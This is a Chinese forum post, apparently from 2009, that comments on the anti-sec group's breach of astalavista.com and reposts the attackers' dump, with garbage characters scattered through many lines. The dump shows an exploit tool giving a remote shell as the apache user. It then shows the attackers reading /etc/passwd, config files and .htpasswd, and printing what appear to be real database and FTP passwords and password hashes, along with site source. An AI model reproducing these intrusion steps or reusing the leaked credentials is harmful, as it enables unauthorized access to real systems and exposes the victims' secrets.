里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。& E! R" v, t, C0 D+ h. z* [
w: P) M0 b/ k: _/ W
[root@front3 ~]# curl -I litespeedtech.com% T) D) h" m; L3 y$ r
HTTP/1.1 200 OK) S! s1 l: \6 p5 |' y
Date: Fri, 05 Jun 2009 22:54:51 GMT! X7 E" ]! F6 x6 `2 C
Server: LiteSpeed
! |3 G% D' t+ T' B% e5 d# |$ H0 j$ t/ Z, F
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
% K8 [' |5 Y$ H0 S
2 ~' D' j: K3 g) Q8 M" d4 ~- l有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。3 J/ ]0 j# M( R% D3 F1 k4 R: y' E! C
. ~. f/ P! u# |' Y* ~! N
. ]( u* L# J" n* G( A* k
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ ' m8 {1 b( V# Y0 [4 h
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \* H" I8 S! j/ Q
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
! v" F7 X6 U) |, K* e5 w\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
' G/ a# y" X! G0 q* A1 k3 Y \/ \/ \/ \/ \/ \/ \/
5 D. w+ j, n6 T7 m, b! Q The Hacking & Security Community+ V; T) l7 a9 i5 M: ?
[+] Founded in 1997 by a hacker computer enthusiast* |5 ^; m- M; d7 B7 o
[-] Exposed in 2009 by anti-sec group
; A& @8 C, H' r$ N
, I8 u+ B# m1 h7 @4 JFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:9 l( A8 t! a4 Y
>> 03. Who’s behind the site?
& W( ~4 p) Y# v' q>>
3 r, _# ?- @& E4 h* K( v>> A team of security and IT professionals, and a countless number of contributors from all over the world.
5 b( t" X: t2 P% Q( j# D$ D- m" K3 y3 U1 z, N0 h( ?; i* Y% y3 b
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?( q7 V: X6 b' d* r2 y8 M1 Y. q5 |* n
>>
* Z6 a( m [& x* e, \! p>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
; m& u& e+ i7 hmilitary institutions.
. ~% K! D* A$ J. X: o% X& x z>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
3 s1 l! D& A1 S+ Q2 {- A' \( \) Z! w# V0 H+ q
Why has Astalavista been targeted?
! K) O# z, m# ?, l' B4 @1 |5 H% q3 W5 c1 B% U
Other than the fact that they are not doing any of this for the “community” but
8 @& h+ l* B+ x! |% S2 Zfor the money, they spread exploits for kids, claim to be a security community" p1 A* \7 Q: u# i7 e/ S
(with no real sense of security on their own servers), and they charge you $6.66
- x5 h* v! A9 ~, C$ t4 T. `! Z oper months to access a dead forum with a directory filled with public releases. I: j- [' \$ C
and outdated / broken services.
3 f& I' `$ R9 h3 Q& U. _
2 f0 y% J7 U2 G, }/ T* yWe wanted to see how good that “team of security and IT professionals” really is.
/ a$ X. f: ~; [# i, W/ f( D$ |6 u' W: w; r) m! Y0 G
Let’s begin.
: s. k: s9 }3 H- }( |" i( l, X2 l+ k: p2 l
anti-sec:~# ./g0tshell astalavista.com -p 80
/ |8 i' a& u: m4 }' {[+] Connecting to astalavista.com:80; V4 i8 _$ F6 `& Q+ q
[+] Grabbing banner…, f6 X2 k$ z' J' k1 o& [, S) W6 J* f
LiteSpeed
5 r8 O/ t4 \% y% N[+] Injecting shellcode…
7 ?* s2 ] s( S; b" ^3 O[-] Wait for it0 B- M9 x7 b3 j
0 |. V9 t! a n% B- o[~] We g0tshell* j2 q5 E' j7 m2 O: m u w( f; }
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
_, K5 U n7 w% l. AID: uid=100(apache) gid=500(apache) groups=500(apache)- j7 h+ N8 R' C2 c+ C* ], d
a3 L8 @. W. p: U3 c
sh-3.2$ cat /etc/passwd
2 J9 b- Z. ^# ~, K7 H1 c8 q7 J$ @root:x:0:0:root:/root:/bin/bash+ b% S5 j# Q/ w4 T
bin:x:1:1:bin:/bin:/sbin/nologin
2 e5 a2 M8 h3 T0 g4 fdaemon:x:2:2:daemon:/sbin:/sbin/nologin
0 s3 r& i+ r! b2 G3 [adm:x:3:4:adm:/var/adm:/sbin/nologin
, u8 Q# r: o8 r" Zlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin( C% x/ Z1 U4 j* M
sync:x:5:0:sync:/sbin:/bin/sync! [) ?* Y# r! N1 m% h6 S
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
. q9 T/ M6 S9 U) Z2 z a" q2 @halt:x:7:0:halt:/sbin:/sbin/halt
& P0 P3 M% g- n; ]7 K; Z7 ymail:x:8:12:mail:/var/spool/mail:/sbin/nologin5 ]& K4 g7 l4 s% M' R
news:x:9:13:news:/etc/news:% \7 H' o8 Y% o
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
: z, V1 v( a& m# ooperator:x:11:0 perator:/root:/sbin/nologin
5 M$ ^) y. K1 u L& g3 ggames:x:12:100:games:/usr/games:/sbin/nologin
" J, K. o8 \" ?8 D4 }: ~0 ]! b1 ]gopher:x:13:30:gopher:/var/gopher:/sbin/nologin, h9 g! \/ G( Y+ z& O
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin" N# u0 H, D# B( r! h
nobody:x:99:99:Nobody:/:/sbin/nologin
# m& b- F3 A2 m2 Zrpm:x:37:37::/var/lib/rpm:/sbin/nologin
0 j3 d8 f2 E$ [# @, `dbus:x:81:81:System message bus:/:/sbin/nologin) p0 h9 Z" W% _& Q
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
. I$ T& K) P2 b: ^mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
* h( S' K) @. bsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin1 ^8 q7 |) S K, s
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin3 w1 w4 z. N/ L+ x h" i# P! K
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin; Z; ^! P; v; {2 g8 ?$ A# s
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin+ ~1 \4 i) P+ W
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
, Q! y7 R4 I6 p! z4 Hnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin; \% Q* {. Q5 @
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin6 K, v1 n* m; n6 H; k
pcap:x:77:77::/var/arpwatch:/sbin/nologin5 T3 I d& V( W9 j% y
named:x:25:25:Named:/var/named:/sbin/nologin
9 h2 G! y4 K o; u" z* w# eapache:x:100:500::/var/www:/bin/false
5 r; t3 J( F2 A* E, gdiradmin:x:101:101::/usr/local/directadmin:/bin/bash) U( @) X; J2 v6 A
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash* }8 P+ Q" `- o' {- r p% B
webapps:x:500:501::/var/www/html:/bin/bash" P- D' H' I0 w) d6 I7 z
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
# t9 Z' H2 D& t- c9 b3 E$ oadmin:x:501:502::/home/admin:/bin/bash
) D7 G. r# a1 g& N2 Yjon:x:502:503::/home/jon:/bin/bash
, J$ \8 @: h: h6 P; fcom:x:503:504::/home/com:/bin/bash
8 r$ |+ Y) U" m% G5 a2 _. \7 kntp:x:38:38::/etc/ntp:/sbin/nologin
" M: a- I/ y- H& Vais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin) E) O! p& S) Z
astanet:x:504:505::/home/astanet:/bin/bash. L5 P4 B, D3 N. r/ Q8 [
avahi:x:70:70:Avahi daemon:/:/sbin/nologin$ w1 m& S+ O4 M: A
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin8 Z9 i6 ?" h( ]" x; R: s p
$ e1 n/ Q( }( N5 E7 M- v' G( `sh-3.2$ cat /etc/hosts
, A) Q4 a' l- N- ^$ ]3 D$ f& A0 X# Do not remove the following line, or various programs
/ W' D1 p, b8 T& l- }+ F \5 |" t. S2 y% D# that require network functionality will fail.
n( H5 u0 y# x" W" ^' C127.0.0.1 localhost.localdomain localhost
& I/ J- j; p S1 A3 y::1 localhost6.localdomain6 localhost6
( l9 }: Z3 p3 y4 D' X c80.74.154.172 asta1.astalavistaserver.com5 f- g0 ] i. i* ?2 t/ ^! I
- s0 U: J; F: K8 D& S
sh-3.2$ pwd
9 o0 {1 `+ e* O, l/home/com/public_html. x0 O' t" j$ [& x4 z4 N5 Q9 G
% k p1 U0 ~, e, I# ^sh-3.2$ ls -la M2 d2 ]6 p2 X: j
total 18460
! u% H+ l" [$ odrwxr-xr-x 30 com apache 4096 May 28 17:06 .
, M: D# z2 Z, ~drwx–x–x 11 com com 4096 Jun 25 2008 .." P2 J/ L. k8 Z5 z4 n; I8 m+ O
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin. [) F, r/ e& V
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
" h) z' r" I% V# y& z* G% |drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin7 [) D6 H0 }/ s7 W
drwxrwxrwx 2 com com 4096 May 19 00:50 config
! G1 E4 C {6 _& c1 adrwxr-xr-x 2 com com 4096 Mar 20 11:05 core& ^0 f5 @" v6 W1 R' ^# y
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
5 u" e: ]7 u ^0 u! R. O. P/ ~' f! adrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing G/ ~) v5 @8 Y {' O9 c
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
- P- ~* k( F1 S$ B- T2 B1 U! e( Qdrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__) F8 u" ^: f$ p0 Z
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
0 T: t7 J% m% P- Xdrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
" v6 ~' z/ V$ K0 jdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
2 H- L a; _$ z-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico) c5 {$ Y1 u2 c4 Q/ v' U
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed5 w5 @4 f3 g* J& s
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess5 Y, j$ B% l3 x2 z
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
( M: C, ]4 a+ J7 T6 \' C-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
. P# t7 n+ _, k8 I! \0 Y9 |& kdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
. O; s" M# p7 \7 k! d/ D! X+ {drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
6 x0 d. k4 g: l7 j5 h6 _, Y! v-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
/ a: V6 ?* S0 }4 jdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer) \' K' `% X' a
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
8 \; v) W) l$ j$ `$ qdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib9 D" L& V$ V; G) Y
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
( A4 j9 ^+ o, o( Q# s% F0 w! vdrwxr-xr-x 8 com com 4096 May 11 12:48 modifications5 g+ n! m: q* \1 D
drwxr-xr-x 34 com com 4096 May 28 16:30 modules, W4 U/ T$ g- E
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
% x1 _; [/ ~9 e6 n7 L+ E7 vdrwxrwxr-x 22 com com 4096 May 28 17:06 _new
9 d9 n+ D- n( x# F, ydrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old: P: e3 F$ k! [/ t1 v0 ]7 f0 P6 @
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
9 [) y! a9 ^9 v/ Qdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
% b, ], D; Z% r. w8 s z' r5 u- q-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt8 {* b( {/ t, ]4 D% t2 I
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
, C* [( ]) U: {& N- R* L7 q V-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
+ \9 o/ }* Y4 q9 ]" G, h+ ?drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes2 ?& A7 D- V+ H+ s% f4 L1 {8 q" |$ i
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp4 B2 {9 z. H3 o2 {/ E
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam+ e3 o* `7 ~$ h! J1 \" y: h# A* w
- W$ Y. f5 i: }9 L$ t" nsh-3.2$ head -20 index.php; \: ^6 w2 T% `1 r: @& \1 s! ~
<?php7 M+ U+ T2 n/ M- A* i' h# m+ a
/ T/ U( _% P& n
/**
n2 J, t N) s8 b) s* The main page for the CMS% S$ p' K- |* C' c9 z
* @copyright CONTREXX CMS - COMVATION AG; ~! t% ^% Y5 ~. I3 b$ q
* @author Comvation Development Team
0 G) z: ^( B* ^3 A* @version v1.0.9.10.1 stable
8 {- ^* \# p# a$ U* @package contrexx6 {3 Z* I; r0 k0 L# L+ c$ g
* @subpackage core
, g1 X5 |# {" a7 q3 {/ w1 p/ s* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
9 a6 a% T5 h6 t: n% N, m1 y0 u* @since v0.0.0.03 j- v3 g/ F* ~' J1 Z. i2 Y: P/ U
* @todo Capitalize all class names in project1 R& N7 ]7 E8 O
* @uses /config/configuration.php
$ D `" V7 F8 V: r: ~# K7 {4 f/ v* @uses /config/settings.php O) T, ]: y( A) a( D5 S3 t- e
* @uses /config/version.php
- w3 t0 _& V) o2 n; q* @uses /core/API.php' p {) ^- Y1 l& p3 i f
* @uses /core_modules/cache/index.class.php+ h; W2 l4 O% Z5 [9 I, |/ I; B
* @uses /core/error.class.php
9 X/ a V. c5 T; z% |8 |* @uses /core_modules/banner/index.class.php
! @( t2 w$ `8 m Y$ x' C9 X7 A* @uses /core_modules/contact/index.class.php) q9 d) |) `. e2 J5 ^+ T5 m8 _
9 ?. W' F$ U4 o7 w+ H( s' e, I. Jsh-3.2$ cd config// g) t2 Y, G' H" K3 _
sh-3.2$ ls -la
& E8 N2 y/ b% i& D9 \( Y6 vtotal 32
4 O0 z/ G& W; u. x0 i" T% Fdrwxrwxrwx 2 com com 4096 May 19 00:50 .
* A( }7 [0 c- E0 v# t! w; Qdrwxr-xr-x 30 com apache 4096 May 28 17:06 ... h1 C. Y6 t6 E- n c& _) W
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
2 r. ?4 H) U# X1 f$ g1 g-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
' }6 m, l0 _' _* C-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php$ R! V! M$ N0 i3 h
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
3 R; f. b! X# ~6 }1 S. p3 N1 @3 o( ]: {: E8 p
sh-3.2$ cat configuration.php3 L% {2 Q: e3 a7 V0 ~: L5 y
[snip]
( D1 y( z- o. D- u' X t6 K6 f0 ~$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
2 y( V6 f: ^. ]" A; h) F# I$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name: C6 I* t+ V$ t0 V E5 I
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix/ H" b# ` {4 U. E; R1 l
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username+ H1 O7 ?3 G, p6 B8 T6 a' b
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password' \) d2 v+ T) }# ?2 E
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
) r/ e8 F8 ], v, Z0 Q. B$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)* _7 s) c9 U. G. R. p: t
[snip]
# I/ M6 x4 L1 y" y6 P* G& n" Q$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
! M3 j' s* V$ p- V }8 @% X3 ^$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode" l, v; T) P( \) \, }, ?$ X/ D
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost+ V4 G9 u. l1 m7 r* o0 [
$_FTPCONFIG['port'] = 21; // Ftp remote port
: s. ?& P- ^+ V$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username1 s, R) |; E" l: t9 b- q$ r
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
) O* a: b6 e1 x8 f$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
. C' u5 J5 ^8 M, o8 P9 j# R0 @" M6 ~5 d+ m! L
sh-3.2$ cd .., J( L- m5 j9 I2 H( B: A+ u
sh-3.2$ cd dvd/+ q% M7 U- h. L6 |# o# C4 }6 b$ h" Z4 X
sh-3.2$ ls -la
' C- F6 j, d9 P0 L/ i: Htotal 2913780- M& |9 v8 k( y; a/ U% s8 D" Z
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
( ^$ c8 c3 a; \/ Y' ?9 R/ ^drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
8 a E3 m2 ~: C$ c-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
/ O. n1 B7 t1 r' o2 a& _-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar0 \* j: W2 z% k
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar: W/ d1 O8 \1 n) `! N3 j7 H
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess- h3 x }# O* @; w5 x% N4 c+ P
) @6 h( V6 Q! i3 p3 s
sh-3.2$ cat .htaccess' ]! I _+ a! H, ~
authType Basic
1 [% T, w3 v# R( n0 W" N: F* g0 TauthName DVD n; N8 S! y4 ?
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd7 A) ]0 D8 Y/ D0 C/ X3 n5 D' D6 c) g
require valid-user% |& T+ u% `4 P% @2 t3 X
/ M8 p& t6 M6 w' Q
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
2 }" i4 t$ A5 }% a7 y9 [2 V& [DVDdownload:CRD8cuY6.MPT6
; I/ a$ L& V" f; ~# G: E: p! [DVDdownload2:CR8a36.wluFMg6 k* d, F4 X2 z5 |6 e
# L, r' y" Q! rsh-3.2$ cat test.php6 l: M2 p1 b3 \9 K5 a8 b
<?php
, T2 {! c; H" y0 u; H3 E) U$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
- J; j+ r; Z. Y$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
- ?9 Y1 y2 ~1 u9 K( }( @# Yecho $url;
- f B% G. Z+ T. V3 R. h?>
) H: w* D" h: ?0 F5 h Q3 q! T+ r o
sh-3.2$ cd modifications/
( |9 ?# |' H+ H7 ?' K2 e3 fsh-3.2$ ls -la
) b3 h& p, b2 q' jtotal 32+ C; Q y: ~/ b6 x
drwxr-xr-x 8 com com 4096 May 11 12:48 .
% b$ `# c7 B$ M9 U8 @6 hdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..) |) z: A2 u' z" d( H
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
! Y' b1 a0 s! V' B1 Hdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
4 ^. {# ~) r0 H( M8 Y7 hdrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools# q6 {( _# M8 D F9 x# J4 r
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
" ]* T. \% V1 e3 D, zdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search3 P4 g6 h. n! e( W' P* q
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp% X* g2 y- }6 ~. N" E
7 W) Y# |$ G0 }4 R- @7 Rsh-3.2$ ls -R
4 |$ t+ E ]8 f* H. W.: x. Q. N* ~& T1 p( K& b7 K+ Q
com_avtng cronjobs onlinetools pjirc search _tmp
, L, G8 ^) f2 _! M3 S6 {; B# u* w3 @3 K7 O* R
./com_avtng:4 Q: z! W6 W, r6 r9 {4 x9 d
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
7 F' z2 _) |& c1 P8 @' j& w5 x& U* g4 f* m$ U0 D3 w
./com_avtng/scripts:2 Y* `5 C$ x: Y& d$ N! m b/ ^" [3 `
popunder.js
3 m0 y" J X# e3 [# g& E7 B: I$ c+ r% X* m7 ^
./cronjobs:
& K7 A: {# q) d; |/ \exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp; A" W& {, o% u5 s9 F/ x5 @5 g
; D4 `- |3 p* ~$ a1 G. k: f
./cronjobs/tmp:
/ ? ]3 D* u4 R9 L/ ~/ ^contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
3 d+ _5 l. \+ o* |+ V0 l2 }# f8 B. C1 d P$ u6 J% t! _: B& x7 _, @
./onlinetools:
/ J3 `% h; z- Z+ Pindex.php. V) Y* M$ f# | B8 i Y9 S) `/ b
/ R; {6 P2 b. F1 M
./pjirc:
8 ]( f% ]. b& Z; v/ n' s+ wa_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt& F- L) }3 b3 ~6 s& A; _
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt6 I; x2 [. h5 u5 w
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
4 x. Q# H {0 z4 o& r+ T/ n T6 D6 E6 F
./pjirc/img:% c' V- }2 W5 g- V: N5 s
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif5 A% L$ N( t+ V( x
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif " C7 |* A8 b( E" w4 C7 t! Y
verre-eau.gif
) L) e( C7 V" H2 J& }argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
$ p3 N& D4 O. N1 F* E( N& X, dverre-vin.gif- G% a$ o. K9 n( k9 V
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif4 \% m* \% C) [, M8 x% z
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif1 [0 V) F2 Q; r& A; c/ Y0 `
+ T( ?8 E4 o& E/ C./pjirc/snd:* V; E! ~$ [' h2 N* ]
bell2.au ding.au7 Q: u+ x) e6 A$ u
; Z: _/ a4 X6 h& B3 j1 n4 T./search:
# B5 f- \. L1 G( m6 t+ T6 {searchEngines.php search.php: G2 j" s" ?$ e+ d+ r+ h! d# y
& i* o& ^9 L o6 G./_tmp:; L: h& p3 e9 l$ A
defaultPorts.php defaultPorts.txt
7 F- P0 o9 {' B Y ?7 _* t: h. _& Y" c) K: i5 H
sh-3.2$ cd cronjobs/
+ H+ j% M5 f! L& P4 ]. [sh-3.2$ cat exploits.php8 W3 Y# }4 G5 j. k5 d1 o
[snip]
- T) I' e r! A$categories = array();0 [# d9 o; K0 I( f( s+ ]4 F8 [
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;; B) F9 ]0 z. O- A, ^0 N# J
$expolits = file($milw0rmFile);8 t8 m- Z* y! {1 {* Z* i
$comExploits = array();7 H7 S5 v# z9 d
[snip]
' |5 ^/ s; V2 ^/ k1 D1 a// manage data' {# A3 I+ [6 l) ?; ^6 h5 D- g
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640$ f) r% T" Q: B
$ [+ p: c+ C* ]9 H- w7 Z& o* B
// get path and title
' ?4 ^& q- S& c* G g $expolits[$x] = trim($expolits[$x]);5 ]5 p. M k0 r0 O0 ]
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));) a6 M# p4 h8 v$ K& b4 g% T* v
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);7 q& m+ _5 d% m2 d$ R/ F8 m9 J
# [: q% K! v% H
// check if file exists( F6 ~# O( C- A$ b) V4 E' }
if (file_exists($path)) {
x3 A8 n# @; }* c$ |( v {' f
6 A; ? E$ F) u$ d( a1 f( ] $text = file_get_contents($path);+ J5 e! {, C& o: N3 H( i. N" R
/ V3 c& ^3 F) z" p4 q8 v
// get content and date
* L. v0 n9 k$ w# }1 M4 Z //$text = htmlspecialchars($text, ENT_QUOTES);6 o1 ]4 {( G# |" b. J
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
0 m$ {8 A5 d/ S if ($tmptext != ”) {
, p7 Z: O& f6 u" `! ]# R' H9 e $text = $tmptext;/ f* c; S0 I9 x. O$ P# k" F
} else {! K+ J' r. a+ V) E
$text = addslashes(htmlentities($text, ENT_QUOTES));
" E0 M/ ~, H2 K7 }3 A }
1 y5 s" g* z8 O. N- L $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
- U! _+ N& Q' d$ k; m $tmp = explode('-', $date);
5 W+ s# J9 {2 d, Z2 _2 R6 _% U$ g $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
' o( i5 z+ O+ H2 q $cat = getCategory ($path);+ l1 \- ^$ t* j9 {6 _& ?% Y+ }- t
$ext = pathinfo(basename($path));9 o" s% d0 a9 F6 v1 ?; [8 M5 b8 I
$ext = $ext['extension'];
) V) E) U2 M( h# p9 `- m $qStr = ”
% L1 {: p. r" O/ x4 f SELECT `id`+ y- N, g) v0 X8 u
FROM `contrexx_module_exploits`
! S, j" X4 Y; A* L1 {, X* U& I" W WHERE `title` = ‘” . $title . “‘0 P8 o0 v/ t4 D4 L _0 d
AND `date` = ‘” . $date . “‘4 J: c# l5 G- P, _/ F$ z( {7 Q
“;, _& k$ d! y: q8 L
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
/ n3 d8 G+ \ s3 J6 i $q = $_objDB->query($qStr);( Q2 B/ o+ E N" b
5 u& |7 q. v! c if ($q->numRows() == 0) {5 c0 K6 \, Q: D: _
8 _0 D7 e4 v9 L
// prepare array$ o c% k" G+ z! y* B7 p
$comExploits[$x]['date'] = $date;; v% ]# @: @9 T- v% x
$comExploits[$x]['title'] = $title;
$ o6 D4 D, u& f# h $comExploits[$x]['author'] = ‘milw0rm’;6 E# I" L$ _9 {
$comExploits[$x]['text'] = $text;( e: Y, f4 r- Z1 Q/ I2 c
$comExploits[$x]['source'] = $ext;
, @+ g, M1 ]8 |/ g. h8 k! O $comExploits[$x]['url1'] = ”;6 _1 n# n, Y$ B2 o
$comExploits[$x]['url2'] = ”;
8 y0 } `& D& e; n2 k3 [, j! { $comExploits[$x]['catid'] = $cat;- g+ l" O6 N" |+ H$ D3 @/ P
$comExploits[$x]['lang'] = ‘2′;
9 l' v' O" H' [4 N( K- m# _$ I $comExploits[$x]['userid'] = ‘12′;; f- ~8 C' z7 d) O0 O
$comExploits[$x]['startdate'] = ‘0000-00-00′;
& s$ `8 t. K* l6 A# S" M $comExploits[$x]['enddate'] = ‘0000-00-00′;
' |' P% w+ n& z- p2 C$ U $comExploits[$x]['status'] = ‘1′;
8 W8 u. |/ i" g9 C $comExploits[$x]['changelog'] = $date;2 p; |& q4 u9 s2 ?2 W
. R$ Z% @2 D) h3 S! ^ }/ ]& y# F* Y) Q1 m/ v5 M' e& Q
[snip]
8 l& B( O( }9 o7 S $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>9 V; g5 F9 q- y- a8 T6 `
<rss version=”2.0″>
6 y1 n9 I; I* i! b <channel>) F# j- }3 `; i! c
<title>ASTALAVISTA.com - Exploits</title># `7 ?5 W2 o7 h* E+ \0 r
